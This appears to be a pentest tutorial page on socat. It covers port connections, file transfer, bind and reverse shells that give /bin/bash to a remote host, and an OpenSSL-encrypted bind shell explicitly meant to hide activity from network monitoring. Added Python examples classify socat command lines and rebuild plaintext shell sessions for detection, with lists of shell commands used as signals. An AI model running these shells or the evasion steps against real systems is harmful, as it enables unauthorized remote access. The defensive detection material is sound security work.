# Socat

### SOCAT

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2FfaVvvr17o0q8jxZ532JF%2Fimage.png?alt=media&#x26;token=050b86bb-4298-40b6-bb50-a5b35f62452d" alt=""><figcaption><p>Socat</p></figcaption></figure>

* Connection To a TCP/UDP Port

**Attacker** Machine

{% code overflow="wrap" fullWidth="false" %}

```bash
socat - TCP4:<IP>:<PORT>
```

{% endcode %}

**`-`**: use standard input/output (stdin) as the first address

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2F5tdJSR47wv3K13eeDlG4%2Fimage.png?alt=media&#x26;token=59e7e8e5-1c20-40fb-a5b1-06045cbf18d6" alt=""><figcaption></figcaption></figure>

* Listening To a TCP/UDP Port

**Victim** Machine

```bash
socat TCP4-LISTEN:<PORT> stdout
```

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2F80Q7VHql2G0Q9euscq5k%2Fimage.png?alt=media&#x26;token=868d8b78-a52b-487e-8b9b-09728bc7b33a" alt=""><figcaption></figcaption></figure>

* Transfer File With Socat

**Attacker** Machine

```bash
socat TCP4:<IP>:<PORT> file:sec.txt,create
```

* **`socat`**: This is the command itself, which stands for "SOcket CAT". It is a multipurpose relay tool that creates two bidirectional byte streams and transfers data between them.
* **`TCP4`**: This specifies the address type and protocol to be used. `TCP4` indicates that the connection will use TCP over IPv4.
* **`<IP>`**: This is a placeholder for the IP address of the remote host to which you want to connect.
* **`<PORT>`**: This is a placeholder for the port number on the remote host to which you want to connect.
* **`file:sec.txt`**: This specifies the second address as a file. The data received from the TCP connection will be written to (or read from) this file. Here, `sec.txt` is the filename.
* **`create`**: This option ensures that the file `sec.txt` is created if it does not already exist. Without this option, if the file does not exist, the command would fail.

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2FMajsgF6s7zAhpfLMqWOo%2Fimage.png?alt=media&#x26;token=2ece2a65-0df8-4a1a-8d4c-80433d8b190c" alt=""><figcaption></figcaption></figure>

**Victim** Machine

```bash
socat TCP4-LISTEN:<PORT>,fork file:sec.txt
```

* `socat`: This is the command itself, which stands for "SOcket CAT". It is a utility for data transfer between two bidirectional data streams.
* `TCP4-LISTEN:<PORT>`: This specifies that `socat` should listen for incoming TCP connections on the specified port (replace `<PORT>` with the actual port number you want to use).
* `fork`: This option tells `socat` to fork (***create a new process***) for each incoming connection. This allows `socat` to handle multiple connections simultaneously.
* `file:sec.txt`: This specifies that the data received from each connection should be written to the file `sec.txt`.

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2FwhHQrsNWlediXzSOvdNt%2Fimage.png?alt=media&#x26;token=82364ad0-cffe-4b4a-975c-2c87ce02737d" alt=""><figcaption></figcaption></figure>

> **The advantage of `socat` is that, with `fork`, more than one person can connect to the same port at the same time and the listener does not close after the first connection is handled. This is what distinguishes it from `nc`.**

{% hint style="info" %}
You can also use standard input/output together with shell redirection (`<`, `>`) instead of the `file:` address.
{% endhint %}

#### Victim Machine

```bash
socat tcp-listen:4444,fork - < sec.txt
```

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2FNw79UURzXMocjfCItTDC%2Fimage.png?alt=media&#x26;token=476db607-d3dd-4236-b01b-4c4781a21f00" alt=""><figcaption><p>From WSL Ubuntu, connected in Termux</p></figcaption></figure>

<mark style="color:red;">`-`</mark> -> Use standard input as the second address; after starting, socat waits for input.

<mark style="color:red;">`<`</mark> -> Shell redirect: the content of `sec.txt` is fed to socat's standard input and sent to the client.

#### Attacker Machine

```bash
socat tcp4:192.168.43.1:4444 - > sec.txt
```

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2FJLNYXCiYfJKHnszIBcgN%2Fimage.png?alt=media&#x26;token=053d8005-2026-4965-a250-e38e5020bb09" alt=""><figcaption></figcaption></figure>

<mark style="color:red;">`-`</mark> -> Use standard input/output as the second address; whatever the listener sends is written to standard output.

<mark style="color:red;">`>`</mark> -> Shell redirect: store the output in a file (overwriting it). Use <mark style="color:red;">`>>`</mark> instead if you want to append to the file's existing content.

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2FfF3mORNPs7jfhDO2ZPTj%2Fimage.png?alt=media&#x26;token=7f1ab522-4805-4bd3-9049-fd574daeb2c1" alt=""><figcaption><p>Fingerprint</p></figcaption></figure>

* Socat Bind Shell

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2FHc6auf4ncv9o3Ji12Esn%2Fimage.png?alt=media&#x26;token=2f37af85-c61d-41d7-a0a0-1c2647d1fe23" alt=""><figcaption></figcaption></figure>

**Attacker** Machine

```bash
socat -d -d -d - TCP4:<IP>:<PORT>
```

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2FpLqUaPFvUTHYYEbvNsKS%2Fimage.png?alt=media&#x26;token=c9c52b54-f9ab-43a2-ae48-3c1f5f937fb8" alt=""><figcaption></figcaption></figure>

**Victim** Machine

```bash
socat -d -d -d tcp4-listen:<PORT>,fork exec:/bin/bash
```

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2F83GCkL72uy29kxlMOPXz%2Fimage.png?alt=media&#x26;token=4f76bccf-25e5-43b9-9f25-eb88e624cf45" alt=""><figcaption></figcaption></figure>

* `socat`: The command-line utility for bidirectional data transfer between two independent data channels.
* `-d -d -d`: These flags enable different levels of debugging output. Each `-d` increases the verbosity of the debug information.
* `tcp4-listen:<PORT>`: This option tells `socat` to listen for incoming TCP connections on the specified port (`<PORT>`). The `tcp4` part specifies that only IPv4 connections are accepted.
* `fork`: This option tells `socat` to fork a new process for each incoming connection. This allows multiple clients to connect simultaneously, each handled by its own process.
* `exec:/bin/bash`: This part of the command specifies that when a connection is established, `socat` should execute `/bin/bash`. This effectively provides a shell to the connected client.

#### Socat Reverse Shells

**Attacker** Machine

```bash
socat -d -d -v tcp4-listen:<PORT> stdout
```

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2F6l6NuQ8l0oSHdXLmWJoA%2Fimage.png?alt=media&#x26;token=0c73ecae-b2ec-4f6b-8d6c-11a397559c3a" alt=""><figcaption></figcaption></figure>

**Victim** Machine

```bash
socat -d -d TCP4:<IP>:<PORT>,fork exec:/bin/bash
```

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2Fa94dAvqNS4UVD43iPKev%2Fimage.png?alt=media&#x26;token=e095d295-63d7-4567-b3ff-09c80bc3547e" alt=""><figcaption></figcaption></figure>
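The address syntax that the bullet lists above describe (`type:target,option,option=value`) is regular enough to parse, and parsing it is exactly how a detection engineer triages socat command lines collected from process telemetry: the same fields that tell you which side listens and which side gets `/bin/bash` tell you whether you are looking at a bind shell, a reverse shell, a relay or a file transfer. The Python below is an added example written for this page, not socat's own code. The command lines it feeds in are constructed to mirror the bind shell, reverse shell, encrypted listener and file-transfer commands shown on this page, and the role labels (`bind shell`, `reverse shell`, `relay`, `stdio client`, ...) are this example's own vocabulary. It goes a little beyond the page's cases by also recognising socket-to-socket relays and plain stdio listeners.

```python
"""Parse socat address specifications and classify what a socat command line sets up.

Added example for this page (not socat's own code). The command lines below are
constructed to mirror the page's bind shell, reverse shell, encrypted shell and
file-transfer commands; the role labels are this example's own vocabulary.
"""
import shlex
from dataclasses import dataclass, field

LISTEN_KINDS = {"tcp-listen", "tcp4-listen", "tcp6-listen", "tcp-l", "tcp4-l", "tcp6-l",
                "udp-listen", "udp4-listen", "udp6-listen", "udp-l",
                "openssl-listen", "ssl-l"}
CONNECT_KINDS = {"tcp", "tcp4", "tcp6", "udp", "udp4", "udp6", "openssl", "ssl"}
STDIO_KINDS = {"-", "stdin", "stdout", "stdio"}
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe", "powershell"}


@dataclass
class Address:
    kind: str                                    # address type, lower-cased, e.g. "tcp4-listen"
    target: str                                  # text after the first ':', e.g. "4444" or "10.0.0.5:4444"
    options: dict = field(default_factory=dict)  # "fork" -> True, "verify" -> "0", "cert" -> "bind.pem"


def parse_address(spec: str) -> Address:
    """Split 'type:target,opt,opt=value' into its parts. '-' and 'stdout' mean stdio."""
    head, *opts = spec.split(",")
    if head.lower() in STDIO_KINDS:
        kind, target = "stdio", ""
    else:
        kind, _, target = head.partition(":")
        kind = kind.lower()
    options = {}
    for opt in opts:
        name, has_value, value = opt.partition("=")
        options[name.lower()] = value if has_value else True
    return Address(kind, target, options)


def parse_socat(cmdline: str):
    """Return (flags, [Address, Address]) for a socat command line."""
    argv = shlex.split(cmdline)
    if not argv or argv[0].rsplit("/", 1)[-1] != "socat":
        raise ValueError("not a socat command line")
    flags = [a for a in argv[1:] if a.startswith("-") and a != "-"]
    addrs = [a for a in argv[1:] if not (a.startswith("-") and a != "-")]
    if len(addrs) != 2:
        raise ValueError("socat takes exactly two addresses, got %d" % len(addrs))
    return flags, [parse_address(a) for a in addrs]


def _is_shell(addr: Address) -> bool:
    """True for exec:/system: addresses whose program is a known shell."""
    if addr.kind not in ("exec", "system") or not addr.target:
        return False
    program = addr.target.split()[0].rsplit("/", 1)[-1]
    return program in SHELL_NAMES


def classify(cmdline: str) -> dict:
    """Label the command line and pull out the fields a detection rule would want."""
    flags, (a, b) = parse_socat(cmdline)
    listen = next((x for x in (a, b) if x.kind in LISTEN_KINDS), None)
    connect = next((x for x in (a, b) if x.kind in CONNECT_KINDS), None)
    shell = next((x for x in (a, b) if _is_shell(x)), None)
    file_ = next((x for x in (a, b) if x.kind == "file"), None)
    network = listen or connect

    if listen and shell:
        role = "bind shell"        # whoever connects to the listening port gets the shell
    elif connect and shell:
        role = "reverse shell"     # the shell is handed to the host the outbound connection reaches
    elif listen and connect:
        role = "relay"             # port forward / proxy between two sockets
    elif network and file_:
        role = "file transfer"
    elif network:
        role = "stdio listener" if listen else "stdio client"
    else:
        role = "other"

    return {
        "role": role,
        "encrypted": bool(network) and network.kind.startswith(("openssl", "ssl")),
        "verify_disabled": bool(network) and network.options.get("verify") == "0",
        "forks": bool(network) and network.options.get("fork") is True,
        # each -d raises verbosity; "-dd" style flags count per letter
        "debug_level": sum(f.count("d") for f in flags if set(f[1:]) <= {"d"}),
        "listen_port": listen.target if listen else None,
        "remote": connect.target if connect else None,
        "shell": shell.target if shell else None,
    }


# Constructed command lines mirroring the page's examples (not captured from a real host).
SAMPLE_COMMANDS = [
    "socat -d -d -d tcp4-listen:4444,fork exec:/bin/bash",
    "socat -d -d TCP4:10.0.0.5:4444,fork exec:/bin/bash",
    "socat -d -d -v openssl-listen:6666,cert=bind.pem,fork,verify=0 exec:/bin/bash",
    "socat TCP4-LISTEN:4444,fork file:sec.txt",
    "socat - TCP4:10.0.0.5:4444",
    "socat tcp-listen:8080,fork tcp:10.0.0.9:80",
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(f"{classify(cmd)['role']:15}  {cmd}")
```

In practice you would feed `classify` the command lines from EDR or `auditd` process-creation events; a `bind shell` or `reverse shell` verdict, or any `exec:` address combined with a network address, is worth an alert on its own, and the `encrypted`/`verify_disabled` fields tell you in advance that the payload will not be readable on the wire.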

### Socat Encrypted Bind Shell

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2FdfqHW0CoOm47N8avCSAF%2Fimage.png?alt=media&#x26;token=4c366bd3-3aeb-4e5c-a210-1dab954767e6" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
In normal (unencrypted) use of the tool, anyone monitoring the communications, for example a SOC team watching everything that happens on the network, sees exactly what you are doing: the commands you run on the server, what you do to victims inside the network, and so on. You can be detected easily, and the analyst will also know exactly what you did.
{% endhint %}

**Let's see this** using Wireshark:

```
ip.addr == 192.168.43.1 && tcp
```

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2F632YfAcEXaJ50NVGGAlf%2Fimage.png?alt=media&#x26;token=a2cdf7c0-b9a7-4089-9846-08f31880b1e2" alt=""><figcaption></figcaption></figure>

**Here I use a filter to show only the TCP packets to and from that host, because you will find a lot of connections using several different protocols, which is normal within a network.**

---

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2FCJCjafqyCBXlWpnWjuPX%2Fimage.png?alt=media&#x26;token=f3daac91-145b-4396-af20-bf4469fcfed7" alt=""><figcaption></figcaption></figure>

***As you can see, as soon as the `ls` command was typed, the packets and connections started to appear.***

---

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2FHNt5PPywlnEFyOqWewZZ%2Fimage.png?alt=media&#x26;token=9c1cf6e9-5b38-433f-a732-9ae9bc5d5aa8" alt=""><figcaption><p>Right Click > Follow > TCP Stream<br>Or<br>Ctrl + Alt + Shift + T</p></figcaption></figure>

{% hint style="info" %}
If you notice some strange characters, it is because they are terminal control sequences: some of them carry the colors shown in the terminal (the color of file names and the color of folders), and others control formatting, such as starting a new line to display the rest of the files.
{% endhint %}

As you can see, this behavior is very clear to anyone monitoring what is happening on the network.
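To make concrete what the "Follow TCP Stream" view is showing, here is an added Python example (not part of the original page) that strips the terminal control sequences the hint above refers to from a captured stream, rebuilds a readable transcript of the session, and then applies the kind of heuristic a network-monitoring rule uses to flag a plaintext interactive shell. The byte payloads and the `c2s`/`s2c` direction labels are constructed for the example (they are not a real capture), and the list of shell command names is this example's own choice.

```python
"""Rebuild a readable transcript from a captured plaintext shell session.

Added example for this page, not from the original. The segments below are constructed
to resemble what Wireshark's Follow TCP Stream shows for an unencrypted socat shell:
client-to-server (c2s) payloads are the typed commands, server-to-client (s2c) payloads
are the output, including the colour escape sequences a terminal would normally interpret.
"""
import re

# CSI sequences (colours, cursor movement), OSC sequences (window title) and the
# remaining two-byte ESC sequences. These are what show up as "strange letters".
ANSI_RE = re.compile(
    rb"\x1b\][^\x07\x1b]*(?:\x07|\x1b\\)"   # OSC ... terminated by BEL or ESC \
    rb"|\x1b\[[0-?]*[ -/]*[@-~]"            # CSI ... final byte (e.g. ESC[01;34m)
    rb"|\x1b[@-Z\\-_]"                       # other ESC Fe sequences
)

# Constructed sample stream as (direction, payload) pairs; not a real capture.
SEGMENTS = [
    ("c2s", b"ls\n"),
    ("s2c", b"\x1b[0m\x1b[01;34mDocuments\x1b[0m  \x1b[01;34mDownloads\x1b[0m  sec.txt\r\n"),
    ("c2s", b"whoami\n"),
    ("s2c", b"www-data\r\n"),
]

# Common interactive-shell command names (example's own list, not exhaustive).
SHELL_WORDS = {"ls", "cd", "pwd", "whoami", "id", "cat", "echo", "uname", "ps",
               "ip", "ifconfig", "netstat", "wget", "curl", "python3"}


def strip_ansi(data: bytes) -> str:
    """Remove terminal control sequences and carriage returns, leaving plain text."""
    return ANSI_RE.sub(b"", data).replace(b"\r", b"").decode("utf-8", "replace")


def reconstruct(segments):
    """Turn per-direction payloads into a list of (direction, line) transcript entries."""
    transcript = []
    for direction, payload in segments:
        for line in strip_ansi(payload).splitlines():
            if line.strip():
                transcript.append((direction, line.rstrip()))
    return transcript


def looks_like_shell_session(segments, min_commands=2):
    """Heuristic used by network detections: the client sends short newline-terminated
    lines whose first word is a common shell command. Returns (verdict, matched_commands)."""
    commands = [line for direction, line in reconstruct(segments) if direction == "c2s"]
    matched = [c for c in commands if c.split()[0] in SHELL_WORDS]
    return len(matched) >= min_commands, matched


if __name__ == "__main__":
    for direction, line in reconstruct(SEGMENTS):
        print(f"{'>' if direction == 'c2s' else '<'} {line}")
    verdict, cmds = looks_like_shell_session(SEGMENTS)
    print("interactive shell:", verdict, cmds)
```

The direction labels are what a stream reassembler gives you for free (Wireshark colours the two directions; a pcap library yields them per packet). The heuristic is deliberately simple: with `exec:/bin/bash` there is no prompt or banner to match on, so the typed command names themselves are the most reliable plaintext signal, which is also why the next section's encryption removes it.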

---

**To hide this, we will encrypt all the communication between us and the other device,** using a key and certificate we will create ourselves.

* Generate key.pem and cert.pem

```bash
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365
```

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2FPL1GnaHYsumE59cSOpWI%2Fimage.png?alt=media&#x26;token=5b13d33b-32c6-4dab-bed5-37e70fa9e614" alt=""><figcaption><p>PEM</p></figcaption></figure>

<mark style="color:red;">`req`</mark> ⇒ Runs OpenSSL in **request** mode, which is used to create or process certificate requests for SSL/TLS certificates.

<mark style="color:red;">`-x509`</mark> ⇒ Indicates that we want to create an X.509 certificate (the common format for digital certificates) directly, instead of a certificate request.

<mark style="color:red;">`-newkey rsa:4096`</mark> ⇒ Tells OpenSSL to generate a new RSA key pair with a length of 4096 bits. The private and public keys are generated in this step.

<mark style="color:red;">`-keyout`</mark> ⇒ Specifies the file in which the private key will be saved. In this case, the private key will be saved in a file called key.pem.

<mark style="color:red;">`-out`</mark> ⇒ Specifies the file in which the public certificate will be saved. In this case, the certificate will be saved in a file called cert.pem.

<mark style="color:red;">`-days`</mark> ⇒ Sets the validity period of the certificate from its issuance; here it is set to one year (365 days).

---

**Attacker** Machine

```bash
socat - openssl:<IP>:<PORT>,verify=0
```

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2F3sMNe28rIX85aXf2rhfA%2Fimage.png?alt=media&#x26;token=59722324-2134-4b31-a69b-e270431a2705" alt=""><figcaption></figcaption></figure>

**Victim** Machine

```bash
socat -d -d -v openssl-listen:6666,cert=bind.pem,fork,verify=0 exec:/bin/bash
```

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2FuZyLWq0eiFfChFGPMXLs%2Fimage.png?alt=media&#x26;token=999401aa-2e0d-4ebf-be78-20b3e13e652f" alt=""><figcaption></figcaption></figure>

### Wireshark

> Data is encrypted using OpenSSL

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2Fosas04yV6ugku2XPpDN6%2Fimage.png?alt=media&#x26;token=6a3f59c6-f12f-49fc-a391-518cc426562e" alt=""><figcaption></figcaption></figure>

### Socat VS Netcat

#### Summary Table

| Feature             | Netcat (nc)            | Socat                                  |
| ------------------- | ---------------------- | -------------------------------------- |
| Protocol Support    | TCP, UDP               | TCP, UDP, SCTP, UNIX sockets, and more |
| Ease of Use         | Simple, easy to use    | More complex, steeper learning curve   |
| Functionality       | Basic networking tasks | Advanced networking capabilities       |
| Port Scanning       | Yes                    | No                                     |
| Data Transformation | No                     | Yes                                    |
| Proxying/Relaying   | Basic                  | Advanced                               |
| Debugging           | Basic                  | Detailed                               |
| File Transfer       | Yes                    | Yes                                    |

#### Conclusion

* **Use `netcat`** for simpler, quick networking tasks such as port scanning, basic data transfer, and simple shell setups.
* **Use `socat`** when you need advanced capabilities such as data transformation, complex proxying, and handling multiple types of sockets and protocols.

Choose the tool based on the complexity of the task and the level of control you need over the network connections and data streams.

### Reverse Shell VS Bind Shell

<figure><img src="https://4250388013-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcgRjLSWS0JF8FXrQAeJd%2Fuploads%2F6TzXn2Q1ssJiHVP2fM7O%2Fimage.png?alt=media&#x26;token=507c406e-7618-4463-9443-39a15b409723" alt=""><figcaption></figcaption></figure>

#### Summary Table

| Feature                  | Reverse Shell                         | Bind Shell                                  |
| ------------------------ | ------------------------------------- | ------------------------------------------- |
| **Connection Initiator** | Target                                | Attacker                                    |
| **Firewall/NAT Evasion** | Easier                                | Harder                                      |
| **Setup Complexity**     | More complex on target side           | Simpler on target side                      |
| **Detection Risk**       | Moderate (outbound connection)        | Higher (listening port)                     |
| **Use Case**             | When outbound connections are allowed | When the attacker can’t receive connections |

> #### Conclusion
>
> * **Reverse Shell** is generally more flexible in bypassing network restrictions.
> * **Bind Shell** can be simpler but is more likely to be blocked by network defenses.
> * Choose the method based on the network environment and specific constraints you are working with. Always ensure you have authorization and understand the legal implications of using these techniques.
> * [**Online Reverse Shell**](https://www.revshells.com/)
